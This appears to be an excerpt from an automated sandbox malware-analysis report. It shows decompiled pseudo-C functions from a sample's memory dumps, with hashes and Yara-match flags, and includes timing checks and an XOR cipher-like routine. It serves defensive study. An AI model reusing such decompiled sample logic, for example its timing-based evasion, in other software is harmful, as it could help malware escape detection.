                                                                                                                            								if( *((char*)(_t80 + 0xb1)) == 0) {
                                                                                                                            									_t43 = E01318F80(0x1318ba0, _t85, _t91, _t97, _t119);
                                                                                                                            									if(_t43 == 0) {
                                                                                                                            										_t78 = _a8;
                                                                                                                            										_t49 = _v41 & 0x000000ff;
                                                                                                                            										continue;
                                                                                                                            									} else {
                                                                                                                            										goto L29;
                                                                                                                            									}
                                                                                                                            								} else {
                                                                                                                            									_t43 = E01356040(_t43, 0x14015f0, _t97, _t119);
                                                                                                                            									_t85 = _a8;
                                                                                                                            									_t53 = _v41 & 0x000000ff;
                                                                                                                            									_t78 = _a8;
                                                                                                                            									_t49 = _v41 & 0x000000ff;
                                                                                                                            									while(1) {
                                                                                                                            										_t89 =  *0x14cfd60; // 0x0
                                                                                                                            										_t109 =  *0x14cfd68; // 0x0
                                                                                                                            										_t116 =  *0x14cfd28; // 0x0
                                                                                                                            										asm("xorps xmm0, xmm0");
                                                                                                                            										asm("repne dec ecx");
                                                                                                                            										asm("dec ax");
                                                                                                                            										asm("mulsd xmm0, xmm1");
                                                                                                                            										asm("repne dec eax");
                                                                                                                            										asm("dec cx");
                                                                                                                            										asm("movsd xmm1, [0xfdb78]");
                                                                                                                            										asm("mulsd xmm1, xmm0");
                                                                                                                            										asm("repne dec esp");
                                                                                                                            										_t112 =  <  ? _t109 :  ~( *(_t78 + 0x180));
                                                                                                                            										r8d = 0x10000;
                                                                                                                            										_t90 =  <  ? _t109 : _t89;
                                                                                                                            										if(_t116 <= 0) {
                                                                                                                            											goto L13;
                                                                                                                            										}
                                                                                                                            										goto L9;
                                                                                                                            									}
                                                                                                                            								}
                                                                                                                            							}
                                                                                                                            							goto L33;
                                                                                                                            						}
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            				L33:
                                                                                                                            			}
































                                                                                                                            0x01318a29
                                                                                                                            0x01318a40
                                                                                                                            0x01318a45
                                                                                                                            0x01318a4a
                                                                                                                            0x01318a4f
                                                                                                                            0x01318a4f
                                                                                                                            0x01318a54
                                                                                                                            0x01318a58
                                                                                                                            0x01318a5e
                                                                                                                            0x01318a6e
                                                                                                                            0x01318a73
                                                                                                                            0x01318a78
                                                                                                                            0x01318a7d
                                                                                                                            0x01318a82
                                                                                                                            0x01318a86
                                                                                                                            0x01318a8b
                                                                                                                            0x01318a98
                                                                                                                            0x01318a9f
                                                                                                                            0x01318aa4
                                                                                                                            0x01318ab5
                                                                                                                            0x01318ac7
                                                                                                                            0x01318ace
                                                                                                                            0x01318ad0
                                                                                                                            0x01318ab7
                                                                                                                            0x01318ab7
                                                                                                                            0x01318ac2
                                                                                                                            0x01318ac2
                                                                                                                            0x01318ad8
                                                                                                                            0x01318ada
                                                                                                                            0x01318adf
                                                                                                                            0x01318adf
                                                                                                                            0x01318aec
                                                                                                                            0x01318b51
                                                                                                                            0x01318b51
                                                                                                                            0x01318b58
                                                                                                                            0x01318b6e
                                                                                                                            0x01318b6e
                                                                                                                            0x01318b7c
                                                                                                                            0x01318aee
                                                                                                                            0x01318af5
                                                                                                                            0x01318b19
                                                                                                                            0x01318b22
                                                                                                                            0x01318959
                                                                                                                            0x0131895e
                                                                                                                            0x00000000
                                                                                                                            0x01318b28
                                                                                                                            0x00000000
                                                                                                                            0x01318b28
                                                                                                                            0x01318af8
                                                                                                                            0x01318b00
                                                                                                                            0x01318b05
                                                                                                                            0x01318b0a
                                                                                                                            0x01318b0f
                                                                                                                            0x01318b12
                                                                                                                            0x01318963
                                                                                                                            0x01318964
                                                                                                                            0x0131896d
                                                                                                                            0x0131897b
                                                                                                                            0x01318985
                                                                                                                            0x01318988
                                                                                                                            0x0131898d
                                                                                                                            0x01318992
                                                                                                                            0x01318996
                                                                                                                            0x0131899b
                                                                                                                            0x013189a0
                                                                                                                            0x013189a8
                                                                                                                            0x013189ac
                                                                                                                            0x013189b8
                                                                                                                            0x013189bc
                                                                                                                            0x013189c2
                                                                                                                            0x013189c9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x013189c9
                                                                                                                            0x01318963
                                                                                                                            0x01318af5
                                                                                                                            0x00000000
                                                                                                                            0x01318aec
                                                                                                                            0x01318963
                                                                                                                            0x01318930
                                                                                                                            0x00000000

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cadcfb983705da15d4a5ff24861409723ae0c54f112e11012fb5ebe3e73de934
                                                                                                                            • Instruction ID: 49fbac7c622267c629fffbc3b9d8a41944fef0b647a673541f60b1ba4171bb80
                                                                                                                            • Opcode Fuzzy Hash: cadcfb983705da15d4a5ff24861409723ae0c54f112e11012fb5ebe3e73de934
                                                                                                                            • Instruction Fuzzy Hash: 80512C72609B8486E749CB29E0403AA7762F796BD8F04D262EA9D53B9DDF3CC055C704
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 75%
                                                                                                                            			E0000025B25BF8A6EC30(intOrPtr* __rcx, intOrPtr _a32, intOrPtr _a40, signed long long _a48, signed long long _a56, long long _a64, long long _a72) {
                                                                                                                            				intOrPtr _v56;
                                                                                                                            				intOrPtr _v64;
                                                                                                                            				void* __rbx;
                                                                                                                            				void* _t27;
                                                                                                                            				void* _t33;
                                                                                                                            				void* _t38;
                                                                                                                            				void* _t39;
                                                                                                                            				void* _t46;
                                                                                                                            				intOrPtr* _t52;
                                                                                                                            				void* _t58;
                                                                                                                            				void* _t59;
                                                                                                                            				void* _t60;
                                                                                                                            				void* _t65;
                                                                                                                            				void* _t66;
                                                                                                                            
                                                                                                                            				_t65 = _t60;
                                                                                                                            				if ( *0xf8aa2840 == 0) goto 0xf8a6ecd7;
                                                                                                                            				if ( *((intOrPtr*)(__rcx + 0x24)) != 0) goto 0xf8a6ecd7;
                                                                                                                            				r9d = 0;
                                                                                                                            				 *((long long*)(_t65 - 0x18)) =  *((intOrPtr*)(__rcx + 0x18));
                                                                                                                            				 *((long long*)(_t65 - 0x20)) =  *((intOrPtr*)(__rcx + 0x10));
                                                                                                                            				 *(_t65 - 0x28) =  *(_t65 - 0x28) & 0x00000000;
                                                                                                                            				 *(_t65 - 0x30) =  *(_t65 - 0x30) & 0x00000000;
                                                                                                                            				_v56 =  *((intOrPtr*)(__rcx + 0x20));
                                                                                                                            				_v64 = 1;
                                                                                                                            				 *(_t65 - 0x48) =  *(_t65 - 0x48) & 0x00000000;
                                                                                                                            				_t27 =  *0xf8a8b480();
                                                                                                                            				if (_t27 != 0) goto 0xf8a6ed26;
                                                                                                                            				"\\%s: %d"();
                                                                                                                            				if (_t27 != 0x522) goto 0xf8a6ecbd;
                                                                                                                            				if ( *0xf8a8b470 == 0) goto 0xf8a6ecbd;
                                                                                                                            				_t55 = __rcx;
                                                                                                                            				_pop(_t52);
                                                                                                                            				goto 0xf8a6efd8;
                                                                                                                            				"\\%s: %d"();
                                                                                                                            				r8d = _t27;
                                                                                                                            				E0000025B25BF8A6D04C(_t52, __rcx,  *_t52, _t59,  *__rcx);
                                                                                                                            				goto 0xf8a6ed2b;
                                                                                                                            				r9d = 0;
                                                                                                                            				_a72 =  *((intOrPtr*)(_t52 + 0x18));
                                                                                                                            				r8d = 0;
                                                                                                                            				_a64 =  *((intOrPtr*)(_t52 + 0x10));
                                                                                                                            				_a56 = _a56 & 0x00000000;
                                                                                                                            				_a48 = _a48 & 0x00000000;
                                                                                                                            				_a40 =  *((intOrPtr*)(_t52 + 0x20));
                                                                                                                            				_a32 = 1;
                                                                                                                            				if (E0000025B25BF8A8B4E0( *((intOrPtr*)(_t52 + 0x20)), _t33, 0, _t38, _t39, _t46,  *((intOrPtr*)(_t52 + 0x10)), _t52, _t55,  *_t52, _t58, _t59, _t65, _t66) != 0) goto 0xf8a6ed26;
                                                                                                                            				"\\%s: %d"();
                                                                                                                            				goto 0xf8a6ecc8;
                                                                                                                            				return 1;
                                                                                                                            			}


















                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b6fa9428165563249f9a3c0272a94dd9ce0bae7418846e6a13d8f6facb968b46
                                                                                                                            • Instruction ID: 881fc2a9a89b0b6d28e77938418c2ed8779f54d30fb536fd54ce228c2f0db59e
                                                                                                                            • Opcode Fuzzy Hash: b6fa9428165563249f9a3c0272a94dd9ce0bae7418846e6a13d8f6facb968b46
                                                                                                                            • Instruction Fuzzy Hash: 29716C33604E44C2EF618B21EC4835E63A1F748BA6F206126FA4943F98DB38C456CB69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 38%
                                                                                                                            			E0131C200(signed int __eax, void* __ebx, void* __edi, signed int* __rax, long long __rbp, unsigned long long __r8, void* __r11, void* __r14, long long _a8) {
                                                                                                                            				char _v8;
                                                                                                                            				long long _v16;
                                                                                                                            				signed int _t26;
                                                                                                                            				void* _t28;
                                                                                                                            				signed int _t29;
                                                                                                                            				intOrPtr _t34;
                                                                                                                            				void* _t35;
                                                                                                                            				void* _t36;
                                                                                                                            				unsigned long long _t41;
                                                                                                                            				unsigned long long _t43;
                                                                                                                            				unsigned long long _t47;
                                                                                                                            				void* _t54;
                                                                                                                            				intOrPtr _t59;
                                                                                                                            				void* _t60;
                                                                                                                            				long long _t62;
                                                                                                                            				void* _t64;
                                                                                                                            				void* _t65;
                                                                                                                            				unsigned long long _t66;
                                                                                                                            				void* _t69;
                                                                                                                            				unsigned long long _t74;
                                                                                                                            				void* _t76;
                                                                                                                            				unsigned long long _t77;
                                                                                                                            				void* _t80;
                                                                                                                            				intOrPtr _t82;
                                                                                                                            				intOrPtr _t83;
                                                                                                                            				unsigned long long _t86;
                                                                                                                            				signed int _t89;
                                                                                                                            				char* _t91;
                                                                                                                            				void* _t93;
                                                                                                                            				unsigned long long _t96;
                                                                                                                            				unsigned long long _t97;
                                                                                                                            				intOrPtr _t101;
                                                                                                                            				void* _t103;
                                                                                                                            				long long _t107;
                                                                                                                            				void* _t108;
                                                                                                                            				void* _t109;
                                                                                                                            				void* _t110;
                                                                                                                            
                                                                                                                            				L0:
                                                                                                                            				while(1) {
                                                                                                                            					L0:
                                                                                                                            					_t109 = __r14;
                                                                                                                            					_t108 = __r11;
                                                                                                                            					_t96 = __r8;
                                                                                                                            					_t28 = __ebx;
                                                                                                                            					_t26 = __eax;
                                                                                                                            					if(_t93 >  *((intOrPtr*)(__r14 + 0x10))) {
                                                                                                                            						break;
                                                                                                                            					}
                                                                                                                            					L32:
                                                                                                                            					_a8 = __rax;
                                                                                                                            					asm("movsd [esp+0x10], xmm0");
                                                                                                                            					E01356200(_t64, __rbp);
                                                                                                                            					asm("movsd xmm0, [esp+0x10]");
                                                                                                                            				}
                                                                                                                            				L1:
                                                                                                                            				_v8 = __rbp;
                                                                                                                            				_t91 =  &_v8;
                                                                                                                            				_t29 =  *__rax;
                                                                                                                            				if(_t29 < 0) {
                                                                                                                            					_t62 = __rax;
                                                                                                                            					_t65 = 0xffffffff;
                                                                                                                            				} else {
                                                                                                                            					_t89 = __rax[0x2a];
                                                                                                                            					_t74 = (__rax[0x24] + _t89 + __rax[0x28]) * _t29 >> 1;
                                                                                                                            					_t62 = __rax;
                                                                                                                            					_t26 = __eax * _t74;
                                                                                                                            					_t65 = (_t74 >> 5) + _t89;
                                                                                                                            				}
                                                                                                                            				_t59 =  *((intOrPtr*)(_t62 + 8));
                                                                                                                            				_t34 =  *0x147b6fc; // 0x80000000
                                                                                                                            				if(_t34 != 0x80000000) {
                                                                                                                            					_t59 =  <  ?  *((intOrPtr*)(_t62 + 0x78)) + 0x100000 : _t59;
                                                                                                                            				}
                                                                                                                            				_t83 =  *((intOrPtr*)(_t62 + 0xa8));
                                                                                                                            				_t76 = _t65;
                                                                                                                            				_t66 = _t65 - _t83;
                                                                                                                            				_t41 = _t66;
                                                                                                                            				if(_t41 < 0) {
                                                                                                                            					_t97 = _t66;
                                                                                                                            					_t96 = _t97 >> 1;
                                                                                                                            					asm("xorps xmm0, xmm0");
                                                                                                                            					asm("repne dec eax");
                                                                                                                            					asm("addsd xmm0, xmm0");
                                                                                                                            					_t66 = _t97;
                                                                                                                            				} else {
                                                                                                                            					asm("xorps xmm0, xmm0");
                                                                                                                            					asm("repne dec eax");
                                                                                                                            				}
                                                                                                                            				asm("movsd xmm1, [0xfa1f3]");
                                                                                                                            				asm("mulsd xmm0, xmm1");
                                                                                                                            				asm("movsd xmm1, [0xfa257]");
                                                                                                                            				asm("ucomisd xmm1, xmm0");
                                                                                                                            				if(_t41 <= 0) {
                                                                                                                            					asm("subsd xmm0, xmm1");
                                                                                                                            					asm("repne dec esp");
                                                                                                                            					asm("dec ecx");
                                                                                                                            				} else {
                                                                                                                            					asm("repne dec esp");
                                                                                                                            				}
                                                                                                                            				_t60 =  <  ? _t96 + _t83 : _t59;
                                                                                                                            				_t43 = _t66;
                                                                                                                            				if(_t43 < 0) {
                                                                                                                            					_t66 = _t66 >> 1;
                                                                                                                            					r8d = r8d & 0x00000001;
                                                                                                                            					asm("xorps xmm0, xmm0");
                                                                                                                            					asm("repne dec ecx");
                                                                                                                            					asm("addsd xmm0, xmm0");
                                                                                                                            				} else {
                                                                                                                            					asm("xorps xmm0, xmm0");
                                                                                                                            					asm("repne dec eax");
                                                                                                                            				}
                                                                                                                            				asm("movsd xmm2, [0xfa1a0]");
                                                                                                                            				asm("mulsd xmm0, xmm2");
                                                                                                                            				asm("ucomisd xmm1, xmm0");
                                                                                                                            				if(_t43 <= 0) {
                                                                                                                            					asm("subsd xmm0, xmm1");
                                                                                                                            					asm("repne dec eax");
                                                                                                                            					asm("dec eax");
                                                                                                                            				} else {
                                                                                                                            					asm("repne dec eax");
                                                                                                                            				}
                                                                                                                            				_t101 =  *((intOrPtr*)(_t62 + 8));
                                                                                                                            				_t103 = _t76;
                                                                                                                            				_t77 = _t76 - _t101;
                                                                                                                            				if(_t103 > _t101 && _t66 < _t77) {
                                                                                                                            					_t66 = _t77;
                                                                                                                            				}
                                                                                                                            				_t69 =  >  ? _t60 : _t66 + _t83;
                                                                                                                            				asm("movsd xmm0, [0xfa14e]");
                                                                                                                            				asm("mulsd xmm0, [ecx+0x20]");
                                                                                                                            				_t86 =  *((intOrPtr*)(_t62 + 0x88)) +  *((intOrPtr*)(_t62 + 0x90)) +  *((intOrPtr*)(_t62 + 0xa0));
                                                                                                                            				_t47 = _t86;
                                                                                                                            				if(_t47 < 0) {
                                                                                                                            					_t86 = _t86 >> 1;
                                                                                                                            					asm("xorps xmm2, xmm2");
                                                                                                                            					asm("repne dec eax");
                                                                                                                            					asm("addsd xmm2, xmm2");
                                                                                                                            				} else {
                                                                                                                            					asm("xorps xmm2, xmm2");
                                                                                                                            					asm("repne dec eax");
                                                                                                                            				}
                                                                                                                            				asm("movsd xmm3, [0xfa12d]");
                                                                                                                            				asm("mulsd xmm3, xmm0");
                                                                                                                            				asm("mulsd xmm2, xmm3");
                                                                                                                            				asm("ucomisd xmm1, xmm2");
                                                                                                                            				if(_t47 <= 0) {
                                                                                                                            					asm("subsd xmm2, xmm1");
                                                                                                                            					asm("repne dec eax");
                                                                                                                            					asm("dec eax");
                                                                                                                            				} else {
                                                                                                                            					asm("repne dec eax");
                                                                                                                            				}
                                                                                                                            				_t80 = _t103;
                                                                                                                            				_t105 =  >  ? _t60 : _t103 - _t86;
                                                                                                                            				_t106 =  >  ? _t60 :  >  ? _t60 : _t103 - _t86;
                                                                                                                            				_t107 =  <  ? _t69 :  >  ? _t60 :  >  ? _t60 : _t103 - _t86;
                                                                                                                            				 *((long long*)(_t62 + 0x18)) = _t107;
                                                                                                                            				_t81 =  <  ? _t107 : _t80;
                                                                                                                            				_t19 = _t62 + 0x68;
                                                                                                                            				_t20 =  <  ? _t107 : _t80;
                                                                                                                            				_t82 =  *_t19;
                                                                                                                            				 *_t19 =  <  ? _t107 : _t80;
                                                                                                                            				if( *0x14814f0 != 0) {
                                                                                                                            					_v16 = _t62;
                                                                                                                            					_t26 = E0134D180(_t28, _t35, _t36, _t54, _t82, _t91, _t109, _t110);
                                                                                                                            					_t62 = _v16;
                                                                                                                            				}
                                                                                                                            				if( *0x14cf32c != 0) {
                                                                                                                            					_t26 = E0131B680(_t26, _t62, _t62, _t108);
                                                                                                                            				}
                                                                                                                            				return _t26;
                                                                                                                            			}
                                                                                                                            0x0131c298
                                                                                                                            0x0131c29b
                                                                                                                            0x0131c2a7
                                                                                                                            0x0131c2b0
                                                                                                                            0x0131c2b6
                                                                                                                            0x0131c2b9
                                                                                                                            0x0131c2be
                                                                                                                            0x0131c2c2
                                                                                                                            0x0131c29d
                                                                                                                            0x0131c29d
                                                                                                                            0x0131c2a0
                                                                                                                            0x0131c2a0
                                                                                                                            0x0131c2c5
                                                                                                                            0x0131c2cd
                                                                                                                            0x0131c2d1
                                                                                                                            0x0131c2d9
                                                                                                                            0x0131c2dd
                                                                                                                            0x0131c2e6
                                                                                                                            0x0131c2ea
                                                                                                                            0x0131c2ef
                                                                                                                            0x0131c2df
                                                                                                                            0x0131c2df
                                                                                                                            0x0131c2df
                                                                                                                            0x0131c2fa
                                                                                                                            0x0131c300
                                                                                                                            0x0131c303
                                                                                                                            0x0131c312
                                                                                                                            0x0131c315
                                                                                                                            0x0131c31c
                                                                                                                            0x0131c31f
                                                                                                                            0x0131c324
                                                                                                                            0x0131c305
                                                                                                                            0x0131c305
                                                                                                                            0x0131c308
                                                                                                                            0x0131c308
                                                                                                                            0x0131c328
                                                                                                                            0x0131c330
                                                                                                                            0x0131c334
                                                                                                                            0x0131c338
                                                                                                                            0x0131c342
                                                                                                                            0x0131c346
                                                                                                                            0x0131c34b
                                                                                                                            0x0131c33a
                                                                                                                            0x0131c33a
                                                                                                                            0x0131c33a
                                                                                                                            0x0131c350
                                                                                                                            0x0131c354
                                                                                                                            0x0131c357
                                                                                                                            0x0131c35d
                                                                                                                            0x0131c365
                                                                                                                            0x0131c365
                                                                                                                            0x0131c36e
                                                                                                                            0x0131c372
                                                                                                                            0x0131c37a
                                                                                                                            0x0131c38d
                                                                                                                            0x0131c394
                                                                                                                            0x0131c397
                                                                                                                            0x0131c3a6
                                                                                                                            0x0131c3af
                                                                                                                            0x0131c3b2
                                                                                                                            0x0131c3b7
                                                                                                                            0x0131c399
                                                                                                                            0x0131c399
                                                                                                                            0x0131c39c
                                                                                                                            0x0131c39c
                                                                                                                            0x0131c3bb
                                                                                                                            0x0131c3c3
                                                                                                                            0x0131c3c7
                                                                                                                            0x0131c3cb
                                                                                                                            0x0131c3cf
                                                                                                                            0x0131c3d8
                                                                                                                            0x0131c3dc
                                                                                                                            0x0131c3e1
                                                                                                                            0x0131c3d1
                                                                                                                            0x0131c3d1
                                                                                                                            0x0131c3d1
                                                                                                                            0x0131c3e6
                                                                                                                            0x0131c3ef
                                                                                                                            0x0131c3f6
                                                                                                                            0x0131c3fd
                                                                                                                            0x0131c401
                                                                                                                            0x0131c408
                                                                                                                            0x0131c40c
                                                                                                                            0x0131c40c
                                                                                                                            0x0131c40c
                                                                                                                            0x0131c40c
                                                                                                                            0x0131c417
                                                                                                                            0x0131c419
                                                                                                                            0x0131c420
                                                                                                                            0x0131c425
                                                                                                                            0x0131c425
                                                                                                                            0x0131c431
                                                                                                                            0x0131c436
                                                                                                                            0x0131c436
                                                                                                                            0x0131c444

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0ec183325937e8cb6d9e9df1917c09e8e7cc4e5f56fff65d5efc61d485023bbb
                                                                                                                            • Instruction ID: dd6064d0aa322498325c548402094440064fd8c50825ef8dcac034ac520900d2
                                                                                                                            • Opcode Fuzzy Hash: 0ec183325937e8cb6d9e9df1917c09e8e7cc4e5f56fff65d5efc61d485023bbb
                                                                                                                            • Instruction Fuzzy Hash: ED5138F2B49F948BDA4B87799114398D216ABA6FC8F14D7219D1A3BF5CD718C1838740
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0000025B25BF8A86D77(signed int __rdx, intOrPtr _a32, intOrPtr _a40, signed long long _a48, void* _a56, intOrPtr _a136) {
                                                                                                                            				signed long long _t196;
                                                                                                                            				signed long long _t197;
                                                                                                                            				signed long long _t198;
                                                                                                                            				signed long long _t199;
                                                                                                                            				signed long long _t200;
                                                                                                                            				signed long long _t240;
                                                                                                                            				signed long long _t243;
                                                                                                                            				signed long long _t246;
                                                                                                                            
                                                                                                                            				_a32 = _a32 + 1;
                                                                                                                            				if (_a32 -  *((intOrPtr*)(_a136 + 0x1e0)) >= 0) goto 0xf8a86f9e;
                                                                                                                            				_a56 = _a56 - 0x10;
                                                                                                                            				_t196 = _a48 + 0x10;
                                                                                                                            				_a48 = _t196;
                                                                                                                            				_t197 = _t196 * 0;
                                                                                                                            				_a40 =  *((intOrPtr*)(_a56 + _t197));
                                                                                                                            				_t240 = _a48;
                                                                                                                            				 *_t240 =  *(0xf8a957a0 + _t197 * 4) ^  *(0xf8a95ba0 + __rdx * 4) ^  *0xBCBDB4EBE20 ^  *0xBCBDB4EC220;
                                                                                                                            				_t198 = _t197;
                                                                                                                            				_a40 =  *((intOrPtr*)(_a56 + _t198));
                                                                                                                            				_t243 = _a48;
                                                                                                                            				 *(_t243 + 0x25bf8a957a0) =  *(0xf8a957a0 + _t198 * 4) ^  *(0xf8a95ba0 + _t240 * 4) ^  *0xBCBDB4EBE20 ^  *0xBCBDB4EC220;
                                                                                                                            				_t199 = _t198 * 2;
                                                                                                                            				_a40 =  *((intOrPtr*)(_a56 + _t199));
                                                                                                                            				_t246 = _a48;
                                                                                                                            				 *(_t246 + 0x4b7f152af40) =  *(0xf8a957a0 + _t199 * 4) ^  *(0xf8a95ba0 + _t243 * 4) ^  *0xBCBDB4EBE20 ^  *0xBCBDB4EC220;
                                                                                                                            				_t200 = _t199 * 3;
                                                                                                                            				_a40 =  *((intOrPtr*)(_a56 + _t200));
                                                                                                                            				 *(_a48 + 0x713e9fc06e0) =  *(0xf8a957a0 + _t200 * 4) ^  *(0xf8a95ba0 + _t246 * 4) ^  *0xBCBDB4EBE20 ^  *0xBCBDB4EC220;
                                                                                                                            				goto E0000025B25BF8A86D77;
                                                                                                                            				_a56 = _a56 - 0x10;
                                                                                                                            				_a48 = _a48 + 0x10;
                                                                                                                            				 *_a48 =  *_a56;
                                                                                                                            				_a48 = _a48 + 4;
                                                                                                                            				_a56 = _a56 + 4;
                                                                                                                            				 *_a48 =  *_a56;
                                                                                                                            				_a48 = _a48 + 4;
                                                                                                                            				_a56 = _a56 + 4;
                                                                                                                            				 *_a48 =  *_a56;
                                                                                                                            				_a48 = _a48 + 4;
                                                                                                                            				_a56 = _a56 + 4;
                                                                                                                            				 *_a48 =  *_a56;
                                                                                                                            				return 0;
                                                                                                                            			}












                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 67a9ee3c501cbda97f38559516458ff95ca4b59fcfc23f289382419eb93840ad
                                                                                                                            • Instruction ID: c0b1d7821590dfb04919f9717afbaa2afcc2052bcb81f61b2ae8735b372046ce
                                                                                                                            • Opcode Fuzzy Hash: 67a9ee3c501cbda97f38559516458ff95ca4b59fcfc23f289382419eb93840ad
                                                                                                                            • Instruction Fuzzy Hash: 1B612AB62149508BDB14CB08E89562AB7E1F3CC7D5F94121AF38E87B68DB3CD544CB50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 25cbce2bf9696ae3ec5ba7b698f64a8dfc06785eb23abb9183bb8660141dc412
                                                                                                                            • Instruction ID: c543b9fef61779465e2b600d139fae34742e9e9513c10a2932b5191c7429c9b1
                                                                                                                            • Opcode Fuzzy Hash: 25cbce2bf9696ae3ec5ba7b698f64a8dfc06785eb23abb9183bb8660141dc412
                                                                                                                            • Instruction Fuzzy Hash: 7E2136B2A65E484FCA43DB3A9410351D20BBF967D0F58CB22AE1B777A5E728D0D28200
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 50%
                                                                                                                            			E013582C0(void* __eax, void* __rax, signed long long __rdx, long long _a8) {
                                                                                                                            				void* _t2;
                                                                                                                            				void* _t5;
                                                                                                                            				signed long long _t7;
                                                                                                                            
                                                                                                                            				_t7 = __rdx;
                                                                                                                            				_t5 = __rax;
                                                                                                                            				_t2 = __eax;
                                                                                                                            				if( *0x14cfaeb != 1) {
                                                                                                                            					asm("mfence");
                                                                                                                            					asm("lfence");
                                                                                                                            					asm("rdtsc");
                                                                                                                            				} else {
                                                                                                                            					asm("rdtscp");
                                                                                                                            				}
                                                                                                                            				_a8 = _t5 + (_t7 << 0x20);
                                                                                                                            				return _t2;
                                                                                                                            			}







                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 991984f95485c17084124b5fca27ac93b5333b5c799aa0c9dc4330b907498c61
                                                                                                                            • Instruction ID: 9fb73dc41e41b73858047269767be53817884bbde07ebba4046fa1cf55406585
                                                                                                                            • Opcode Fuzzy Hash: 991984f95485c17084124b5fca27ac93b5333b5c799aa0c9dc4330b907498c61
                                                                                                                            • Instruction Fuzzy Hash: 98C02BF0907FC628FF90C30971003557DC68F047CCD80C0C0924D00B25D62D82844204
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 66%
                                                                                                                            			E0000025B25BF8A77FC4(void* __edx, long long __rbx, signed int __rcx, long long __rdi, long long __rsi, long long __rbp, signed int __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                                                                            				void* _t22;
                                                                                                                            				char* _t27;
                                                                                                                            				void* _t31;
                                                                                                                            				void* _t32;
                                                                                                                            				void* _t34;
                                                                                                                            				intOrPtr _t42;
                                                                                                                            				void* _t44;
                                                                                                                            				void* _t47;
                                                                                                                            				long long _t69;
                                                                                                                            				int _t71;
                                                                                                                            				long long _t73;
                                                                                                                            				int _t91;
                                                                                                                            				long long _t101;
                                                                                                                            				long long _t103;
                                                                                                                            				char* _t110;
                                                                                                                            				char* _t112;
                                                                                                                            				int _t114;
                                                                                                                            
                                                                                                                            				_t47 = __edx;
                                                                                                                            				if ( *__r8 == 1) goto 0xf8a78224;
                                                                                                                            				if ( *__r8 == 2) goto 0xf8a77fe0;
                                                                                                                            				goto 0xf8a78310;
                                                                                                                            				asm("int3");
                                                                                                                            				asm("int3");
                                                                                                                            				asm("int3");
                                                                                                                            				_t69 = _t103;
                                                                                                                            				 *((long long*)(_t69 + 8)) = __rbx;
                                                                                                                            				 *((long long*)(_t69 + 0x10)) = __rbp;
                                                                                                                            				 *((long long*)(_t69 + 0x18)) = __rsi;
                                                                                                                            				 *((long long*)(_t69 + 0x20)) = __rdi;
                                                                                                                            				r15d = 0;
                                                                                                                            				r14d = __edx;
                                                                                                                            				E0000025B25BF8A7B50C(_t22, __rbx, __rcx);
                                                                                                                            				_t5 = _t114 + 1; // 0x1
                                                                                                                            				r12d = _t5;
                                                                                                                            				_t101 = _t69;
                                                                                                                            				if ( *0xf8aa1b80 != _t114) goto 0xf8a780e6;
                                                                                                                            				if ( *((intOrPtr*)(__rcx + (__rcx | 0xffffffff) + 1)) != r15b) goto 0xf8a7802b;
                                                                                                                            				malloc(_t114);
                                                                                                                            				 *0xf8aa1b80 = _t69;
